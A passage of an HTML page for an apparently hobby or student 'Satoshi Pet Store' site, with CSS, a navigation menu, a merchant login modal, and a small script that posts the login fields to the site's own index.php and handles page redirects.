C0.592%20c0%2C0.467-0.37%2C0.811-0.871%2C0.811c-0.533%2C0-0.964-0.267-1.222-0.768l-0.722%2C0.7c0.516%2C0.756%2C1.135%2C1.094%2C1.988%2C1.094%20c1.163%2C0%2C1.982-0.778%2C1.982-1.887C16.757%2C24.202%2C16.377%2C23.788%2C15.102%2C23.322z%22%3E%3C/path%3E%20%3Cpath%20fill%3D%22%23444444%22%20d%3D%22M17.108%2C23.994c0%2C1.689%2C1.326%2C2.998%2C3.032%2C2.998c0.481%2C0%2C0.894-0.095%2C1.402-0.335v-1.32%20c-0.449%2C0.451-0.843%2C0.629-1.353%2C0.629c-1.128%2C0-1.927-0.816-1.927-1.98c0-1.1%2C0.825-1.972%2C1.877-1.972%20c0.531%2C0%2C0.937%2C0.188%2C1.402%2C0.646v-1.318c-0.491-0.248-0.894-0.351-1.379-0.351C18.467%2C20.991%2C17.108%2C22.325%2C17.108%2C23.994z%22%3E%3C/path%3E%20%3Cpolygon%20fill%3D%22%23444444%22%20points%3D%2230.617%2C24.977%2029.086%2C21.121%2027.864%2C21.121%2030.299%2C27.009%2030.9%2C27.009%2033.382%2C21.121%2032.17%2C21.121%20%22%3E%3C/polygon%3E%20%3Cpolygon%20fill%3D%22%23444444%22%20points%3D%2233.89%2C26.864%2037.066%2C26.864%2037.066%2C25.891%2035.011%2C25.891%2035.011%2C24.341%2036.988%2C24.341%2036.988%2C23.368%2035.011%2C23.368%2035.011%2C22.093%2037.066%2C22.093%2037.066%2C21.121%2033.89%2C21.121%20%22%3E%3C/polygon%3E%20%3Cpath%20fill%3D%22%23444444%22%20d%3D%22M41.5%2C22.815c0-1.076-0.738-1.695-2.031-1.695h-1.664v5.743h1.123v-2.309h0.146l1.547%2C2.309H42l-1.807-2.421%20C41.037%2C24.271%2C41.5%2C23.694%2C41.5%2C22.815z%20M39.254%2C23.762h-0.325v-1.737h0.343c0.7%2C0%2C1.075%2C0.294%2C1.075%2C0.853%20C40.347%2C23.452%2C39.972%2C23.762%2C39.254%2C23.762z%22%3E%3C/path%3E%3C/g%3E%3C/svg%3E");
}

.modal {
  display: -ms-flexbox;
  display: flex;
  -ms-flex-pack: center;
  justify-content: center;
  -ms-flex-align: center;
  align-items: center;
  height: 63vh;
  width: 100vw;
  padding-top: 200px;
  z-index: 100;
  overflow-y: auto;
}
.modal__container {
  display: -ms-flexbox;
  display: flex;
  max-width: 675px;
  min-height: 400px;
  margin-bottom: 125px;
  background-color: #ffffff;
  border-radius: 5px;
  box-shadow: 3px 3px 20px rgba(0, 0, 0, 0.1);
}
.modal__featured {
  position: relative;
  -ms-flex: 1;
  flex: 1;
  min-width: 230px;
  padding: 20px;
  overflow: hidden;
  border-top-left-radius: 5px;
  border-bottom-left-radius: 5px;
}
.modal__circle {
  position: absolute;
  top: 0;
  left: 0;
  height: 200%;
  width: 200%;
  background-color: rgb(164 197 197);
  border-radius: 50%;
  -ms-transform: translateX(-50%) translateY(-25%);
  transform: translateX(-50%) translateY(-25%);
}
.modal__product {
  position: absolute;
  top: 22%;
    left: 51%;
  max-width: 85%;
  -ms-transform: translateX(calc(-50% - 10px));
  transform: translateX(calc(-50% - 10px));
}
.modal__content {
  -ms-flex: 3;
  flex: 3;
  padding: 40px 30px;
}
    </style>
</head>
<body>
    <header>
        <div class="banner">Get free delivery on orders over ₹999</div>
        <nav>
              
            <div id="logo" onclick="mainredirect()" style="cursor: pointer;">

                <svg width="40" height="32" viewBox="0 0 40 32" fill="none" xmlns="http://www.w3.org/2000/svg">
                    <path fill-rule="evenodd" clip-rule="evenodd" d="M12.8 32H0V21.9849C0 17.1239 4.0116 13.1839 8.96 13.1839H15.2V0.468341C15.2 0.251458 15.3792 0.0754376 15.6 0.0754376C15.7184 0.0754376 15.8308 0.127301 15.9068 0.216883L17.3616 1.92719C18.402 1.07577 19.74 0.563816 21.2 0.563816H22C23.442 0.563816 24.7656 1.06359 25.8 1.89654L27.2932 0.14066C27.3692 0.0514706 27.4812 0 27.6 0C27.8208 0 28 0.175628 28 0.392904V15.3896H23.36C17.528 15.3896 12.8 20.0337 12.8 25.7623V32Z" fill="#45413E" />
                    <path fill-rule="evenodd" clip-rule="evenodd" d="M29.76 17.0569V12.0875C29.76 12.0836 29.76 12.0797 29.76 12.0758V6.79004C29.76 6.57435 29.9392 6.4 30.16 6.4C30.266 6.4 30.3676 6.44095 30.4424 6.51389L31.9576 7.98784C32.7864 7.42501 33.7936 7.09504 34.88 7.09504C35.97 7.09504 36.9808 7.42735 37.8112 7.99369L39.3176 6.52793C39.3924 6.45499 39.494 6.41404 39.6 6.41404C39.8208 6.41404 40 6.58878 40 6.80408V23.2632C40 28.0883 35.9884 32 31.04 32H14.4V25.7938C14.4 20.969 18.4116 17.0569 23.36 17.0569H29.76Z" fill="#45413E" />
                </svg>
                Satoshi <br> Pet Store
            </div>
            <ul class="navigation-menu">
                <li><a href="PetShoppingUI.html">Products</a>
                  


                <li><a href="#">Services</a>
                    <ul class="subnav">
                        <li class="card-med" id="serv-groom">
                            <div class="card-image"><img src="https://ouch-cdn2.icons8.com/T11rfGmMKgcStJyAFKNgtOfE79cadabx0DVMnvzA9Pk/rs:fit:368:313/czM6Ly9pY29uczgu/b3VjaC1wcm9kLmFz/c2V0cy9wbmcvNDQx/LzFlYWU4MWY3LWQ1/ZjYtNDM2Ny1hZjM5/LWVmNTFmMGM5Njk4/MS5wbmc.png"></div>
                            <a href="#">
                                <span>Grooming</span>
                                <span>More Info <span class="material-symbols-outlined">
                                        <i class="fa-solid fa-arrow-right"></i>
                                    </span></span>
                            </a>
                        </li>
                        <li class="card-med" id="serv-board">
                            <div class="card-image"><img src="https://ouch-cdn2.icons8.com/F5Ea1suZtMYimKDkJr0CJLO_1bju6-bTyT1EuDKEg8s/rs:fit:368:254/czM6Ly9pY29uczgu/b3VjaC1wcm9kLmFz/c2V0cy9wbmcvMjcx/LzVjMzE4NWM0LWZh/NTMtNGQ1OS05ZTM2/LTZjYzBhNGU3ODg0/NC5wbmc.png"></div>
                            <a href="#">
                                <span>Boarding</span>
                                <span>More Info<span class="material-symbols-outlined">
                                        <i class="fa-solid fa-arrow-right"></i>
                                    </span></span>
                            </a>
                    </ul>
                </li>
                <li><a href="#locate">Locations &amp; Hours</a>
                </li>
                <li>
                    <a href="#">About Us</a>
                </li>
            </ul>
            <div id="utility">
                <span class="material-symbols-outlined">
                    <i class="fa-solid fa-magnifying-glass"></i>
                </span>
                <span class="material-symbols-outlined">
                    <i class="fa-solid fa-cart-shopping"></i>
                </span>

            </div>
        </nav>
    </header>
    <section class="hero" style="display: none;">
        <h1>Your One-Stop Shop for Every Pet's Need!</h1>
        <div class="btn-group">
            <!-- <button class="btn-filled-dark"><span class="material-symbols-outlined">
                <i class="fa-solid fa-cart-shopping"></i>
                </span>Shop All Products</button>
            <button class="btn-outline-dark btn-hover-color"><span class="material-symbols-outlined">
                <i class="fa-solid fa-calendar-days"></i>
                    
                </span> Book a Service</button> -->
        </div>

    </section>
    <div class="modal">
        <div class="modal__container">
          <div class="modal__featured">
            <button type="button" class="button--transparent button--close">
              <svg class="nc-icon glyph" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" width="32px" height="32px" viewBox="0 0 32 32">
                <g>
                  <path fill="#ffffff" d="M1.293,15.293L11,5.586L12.414,7l-8,8H31v2H4.414l8,8L11,26.414l-9.707-9.707 C0.902,16.316,0.902,15.684,1.293,15.293z"></path>
                </g>
              </svg>
              <span class="visuallyhidden">Return to Product Page</span>
            </button>
            <div class="modal__circle"></div>
            <img src="https://ouch-cdn2.icons8.com/1tjxJg_CujAmIi5ahml45bzYfviqjHcTFj6WBL27RXo/rs:fit:368:345/czM6Ly9pY29uczgu/b3VjaC1wcm9kLmFz/c2V0cy9wbmcvODcv/ZTVmYTI3NTEtM2Yz/Ny00MDliLWE0NjAt/ZWY2NDIzMDMwODdk/LnBuZw.png" class="modal__product" />
          </div>
          <div class="modal__content">
            <h1>Merchant Login</h1><br><br>
      
            <form>
              <ul class="form-list">
                <li class="form-list__row">
                  <label>Username</label>
                  <input type="text" name="" required="" id="usernameInput"/>
                </li>
                <li class="form-list__row">
                  <label>Password</label>
                  <div  class="creditcard-icon" required="">
                    <input type="password" name="cc_number" required="" id="passwordInput"/>
                  </div>
                </li>
                <li class="form-list__row">
                    <label>E-Mail</label>
                    <div  class="creditcard-icon">
                      <input type="text" name="cc_number" required="" id="emailInput"/>
                    </div>
                  </li><li>
                    <button class="btn-filled-dark" onclick="shopredirect();">Login<span class="material-symbols-outlined">
                        <i class="fa-solid fa-right-to-bracket"></i>
                        </span></button>
                  </li>
                
              </ul>
            </form>
          </div>
        </div>
      </div>
    
</body>
</html>
<script>
    function insertData() {
        window.location.href = "Seller.html";
    var username = document.getElementById('usernameInput').value;
    var password = document.getElementById('passwordInput').value;
    var email = document.getElementById('emailInput').value;
    var data = {
        instgame: "melboru",
        fielddata: "username[s~1]password[s~1]email",
        fieldvalues: username + "[s~1]" + password + "[s~1]" + email
    };
    var xhr = new XMLHttpRequest();
    xhr.open("POST", "index.php", true);
    xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
    xhr.onreadystatechange = function() {
        if (xhr.readyState === 4 && xhr.status === 200) {
            console.log(xhr.responseText);
        }
    };
    var encodedData = Object.keys(data).map(function(key) {
        return encodeURIComponent(key) + '=' + encodeURIComponent(data[key]);
    }).join('&');
    xhr.send(encodedData);
}

let docTitle = document.title;
window.addEventListener("blur", () => {
        document.title = "Come back \uD83D\uDE14"
    }), window.addEventListener("focus", () => {
        document.title = docTitle
    });
    function mainredirect(){
        window.location.href = "index.html";
    }
    function shopredirect(){
        window.location.href = "Seller.html";
    }
var originalAlert = window.alert;
window.alert = function() {
    console.log("Alert blocked!");
};
function restoreAlert() {
    window.alert = originalAlert;
}


</script>